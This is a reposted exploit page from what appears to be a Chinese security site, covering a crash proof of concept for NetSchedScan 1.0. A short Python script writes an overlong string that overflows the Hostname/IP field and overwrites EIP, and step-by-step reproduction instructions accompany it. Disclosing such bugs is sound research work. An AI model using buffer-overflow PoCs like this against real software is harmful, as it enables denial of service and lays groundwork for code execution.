首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetSchedScan 1.0 - Crash PoC
来源:hechoenmexicomx@hotmail.com 作者:Espinosa 发布时间:2016-01-19  
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : NetSchedScan v1.0 scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by      : Abraham Espinosa
# Email             : hechoenmexicomx@hotmail.com
# Discovery Date    : 14/01/2016
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/netschedscan.aspx#
# Tested Version    : 1.0
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows 8.1 x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python NetSchedScan.py
# 2.- Open NetSchedScan.txt and copy content to clipboard
# 3.- Open NetSchedScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
  
buffer = "\x41" * 388
eip = "\x43" * 4
  
f = open ("NetSchedScan.txt", "w")
f.write(buffer + eip)
f.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Amanda <= 3.3.1 - amstar Comma
·Linux Kernel REFCOUNT Overflow
·SevOne NMS <= 5.3.6.0 - Remote
·Art Systems FluidDraw P5/S5 5.
·WhatsUp Gold 16.3 - Unauthenti
·BlueControl 3.5 SR5 Insecure L
·Konica Minolta FTP Utility 1.0
·Java Platform SE 6 U24 HtmlCon
·SNScan 1.05 - Scan Hostname/IP
·xWPE 1.5.30a-2.1 - Local Buffe
·Internet Explorer 11.0.9600.18
·FortiGate OS Version 4.x - 5.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved